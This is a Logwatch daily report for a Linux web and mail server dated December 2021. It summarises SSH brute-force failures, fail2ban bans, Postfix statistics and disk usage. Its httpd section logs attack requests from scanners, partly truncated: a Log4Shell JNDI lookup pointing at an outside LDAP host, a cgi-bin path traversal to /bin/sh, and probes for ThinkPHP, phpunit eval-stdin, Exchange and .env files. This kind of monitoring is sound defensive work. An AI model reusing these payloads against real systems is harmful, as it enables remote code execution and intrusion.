[TOPF] Logwatch for h2361197.stratoserver.net (Linux)

Mittwoch, 29 Dezember 2021


 
 ################### Logwatch 7.4.0 (03/01/11) #################### 
        Processing Initiated: Wed Dec 29 04:42:04 2021
        Date Range Processed: yesterday
                              ( 2021-Dec-28 )
                              Period is day.
        Detail Level of Output: 0
        Type of Output/Format: mail / text
        Logfiles for Host: h2361197.stratoserver.net
 ################################################################## 
 
 --------------------- fail2ban-messages Begin ------------------------ 

 Banned services with Fail2Ban:				 Bans:Unbans
    ssh:                                                    [ 16:16 ]
 
 ---------------------- fail2ban-messages End ------------------------- 

 
 --------------------- httpd Begin ------------------------ 

 
 Connection attempts using mod_proxy:
    34.74.203.130 -> 161.97.119.209:25562: 1 Time(s)
    92.118.234.202 -> zapf.wiki:443: 3 Time(s)
 
 A total of 5 sites probed the server 
    103.156.91.51
    159.223.29.144
    159.223.37.69
    165.227.221.200
    8.210.90.76
 
 Requests with error response codes
    400 Bad Request
       null: 5 Time(s)
       mstshash=Domain: 4 Time(s)
       /: 3 Time(s)
       /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... EqNlzwFY0iMAAAG: 3 Time(s)
       zapf.wiki:443: 3 Time(s)
       /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
       /ab2g: 1 Time(s)
       /ab2h: 1 Time(s)
       /w00tw00t.at.ISC.SANS.DFind:): 1 Time(s)
       161.97.119.209:25562: 1 Time(s)
       ?: 1 Time(s)
       \xF1\x9D\x92B+\xF6vU\xC7G,\xA55\x86b\xDFn1 ... C0$\xC0\x14\xC0: 1 Time(s)
       r+\xD3\x00\xF5\xFE\xB78\x0C\xA7\x14\xE5\xE ... 00\x18\x005\x00: 1 Time(s)
       s\xBC\x8Ed\xBC\xE2: 1 Time(s)
    500 Internal Server Error
       /: 23 Time(s)
       /robots.txt: 3 Time(s)
       /Autodiscover/Autodiscover.xml: 2 Time(s)
       /_ignition/execute-solution: 2 Time(s)
       /ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
       /.env: 1 Time(s)
       /?q=%indefatigableness%&va=b&t=hc&ia=web: 1 Time(s)
       /?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
       /HNAP1/: 1 Time(s)
       /actuator/health: 1 Time(s)
       /common/info.cgi: 1 Time(s)
       /console/: 1 Time(s)
       /currentsetting.htm: 1 Time(s)
       /dniapi/userInfos: 1 Time(s)
       /index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
       /mifs/.;/services/LogService: 1 Time(s)
       /owa/auth/logon.aspx: 1 Time(s)
       /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
       /owa/auth/x.js: 1 Time(s)
       /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
 
 ---------------------- httpd End ------------------------- 

 
 --------------------- pam_unix Begin ------------------------ 

 sshd:
    Authentication Failures:
       root (128.199.115.81): 36 Time(s)
       root (104.131.96.156): 33 Time(s)
       root (ip-198-12-255-244.ip.secureserver.net): 31 Time(s)
       root (211.45.247.122): 19 Time(s)
       unknown (ip-198-12-255-244.ip.secureserver.net): 17 Time(s)
       unknown (104.131.96.156): 16 Time(s)
       root (106.51.80.198): 15 Time(s)
       root (181.13.51.177): 14 Time(s)
       unknown (128.199.115.81): 14 Time(s)
       root (111.93.214.67): 10 Time(s)
       root (167.99.65.232): 10 Time(s)
       unknown (211.45.247.122): 9 Time(s)
       root (123.156.225.58): 7 Time(s)
       unknown (123.156.225.58): 7 Time(s)
       root (167.99.36.169): 6 Time(s)
       unknown (106.51.80.198): 6 Time(s)
       unknown (111.93.214.67): 3 Time(s)
       unknown (167.99.65.232): 3 Time(s)
       unknown (181.13.51.177): 3 Time(s)
       unknown (24-220-156-37-dynamic.midco.net): 2 Time(s)
       mailman (110.77.177.42): 1 Time(s)
       mysql (104.131.96.156): 1 Time(s)
       root (103.144.82.250): 1 Time(s)
       root (164.92.214.107): 1 Time(s)
       root (165.232.92.229): 1 Time(s)
       unknown (118.99.79.52): 1 Time(s)
       unknown (141.98.10.202): 1 Time(s)
       unknown (141.98.10.63): 1 Time(s)
       unknown (144.255.28.220): 1 Time(s)
    Invalid Users:
       Unknown Account: 84 Time(s)
 
 
 ---------------------- pam_unix End ------------------------- 

 
 --------------------- Postfix Begin ------------------------ 

        3   Miscellaneous warnings  
 
   12.959K  Bytes accepted                              13,270
   12.959K  Bytes sent via SMTP                         13,270
 ========   ==================================================
 
        1   Accepted                                   100.00%
 --------   --------------------------------------------------
        1   Total                                      100.00%
 ========   ==================================================
 
        3   4xx Reject relay denied                    100.00%
 --------   --------------------------------------------------
        3   Total 4xx Rejects                          100.00%
 ========   ==================================================
 
      201   Connections             
       23   Connections lost (inbound) 
      201   Disconnections          
        1   Removed from queue      
        1   Sent via SMTP           
 
        8   Timeouts (inbound)      
 
 
 ---------------------- Postfix End ------------------------- 

 
 --------------------- sendmail-largeboxes (large mail spool files) Begin
------------------------ 

 Large Mailbox threshold: 40MB (41943040 bytes)
  Warning: Large mailbox: mailman.gz (1747199807)
  Warning: Large mailbox: mailman (235703599967)
 
 ---------------------- sendmail-largeboxes (large mail spool files) End
------------------------- 

 
 --------------------- SSHD Begin ------------------------ 

 
 Failed logins from:
    103.144.82.250: 1 time
    104.131.96.156: 34 times
    106.51.80.198 (106.51.80.198.actcorp.in): 15 times
    110.77.177.42: 1 time
    111.93.214.67 (static-67.214.93.111-tataidc.co.in): 10 times
    123.156.225.58: 7 times
    128.199.115.81 (128.199.162.143-newcopy): 36 times
    164.92.214.107: 1 time
    165.232.92.229: 1 time
    167.99.36.169: 6 times
    167.99.65.232: 10 times
    181.13.51.177 (host-181-13-51-177.mendoza.gov.ar): 14 times
    198.12.255.244 (ip-198-12-255-244.ip.secureserver.net): 31 times
    211.45.247.122: 19 times
 
 Illegal users from:
    2001:470:1:c84::12: 1 time
    undef: 71 times
    24.220.156.37 (24-220-156-37-dynamic.midco.net): 2 times
    65.49.20.68 (scan-19.shadowserver.org): 1 time
    104.131.96.156: 16 times
    106.51.80.198 (106.51.80.198.actcorp.in): 6 times
    111.93.214.67 (static-67.214.93.111-tataidc.co.in): 3 times
    118.99.79.52: 1 time
    123.156.225.58: 7 times
    128.199.115.81 (128.199.162.143-newcopy): 14 times
    141.98.10.63: 1 time
    141.98.10.202: 1 time
    144.255.28.220: 1 time
    154.89.5.79: 1 time
    167.99.65.232: 3 times
    181.13.51.177 (host-181-13-51-177.mendoza.gov.ar): 3 times
    198.12.255.244 (ip-198-12-255-244.ip.secureserver.net): 17 times
    211.45.247.122: 9 times
 
 **Unmatched Entries**
 fatal: no matching cipher found: client aes128-cbc,blowfish-cbc,3des-cbc server
aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com
[preauth] : 8 time(s)
 
 ---------------------- SSHD End ------------------------- 

 
 --------------------- Disk Space Begin ------------------------ 

 Filesystem         Size  Used Avail Use% Mounted on
 /dev/ploop33257p1  394G  242G  132G  65% /
 none               4.0G     0  4.0G   0% /dev
 
 
 ---------------------- Disk Space End ------------------------- 

 
 ###################### Logwatch End #########################

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

[TOPF] Logwatch for h2361197.stratoserver.net (Linux)